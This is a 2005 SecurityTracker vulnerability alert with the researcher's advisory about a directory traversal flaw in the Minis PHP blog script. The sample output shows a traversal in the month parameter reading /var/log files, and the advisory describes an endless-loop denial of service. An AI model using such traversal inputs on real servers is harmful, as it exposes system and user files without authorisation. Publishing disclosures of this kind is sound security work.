Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   Minis Vendors:
Minis Discloses Certain Files to Remote Users
SecurityTracker Alert ID:  1012911
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.2.1
Description:   Madelman reported a vulnerability in Minis. A remote user can view certain files on the system.

The script does not properly validate the user-supplied month parameter. A remote user can view files that have the '.log' file extension. A demonstration exploit URL is provided:


If the user attempts to view a file that the web server process does not have privileges to read, the script will enter an endless loop. A demonstration exploit URL is provided:


The vendor was notified on December 31, 2004.

Impact:   A remote user can view files on the system that have the '.log' file extension.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Minis directory traversal vulnerability

Hash: SHA1

Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT>
Date: 31/12/2004
Severity: Moderate

- --------

(from vendor site:

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with .log extension

This vulnerability has been tested with Minis 0.2.1

- --------

If we want to read /var/log/XFree86.0.log:

RETURNS: (looking at source of HTML)
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org.  Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version (Debian 4.3.0.dfsg.1-4 20040529113443
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"

No such month.

If we try to read a file the webserver doesn't have autorization to, Minis enters an endless loop which
could cause an incredible amount of bandwith spent by the server or even a DoS

Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109


Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird -


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC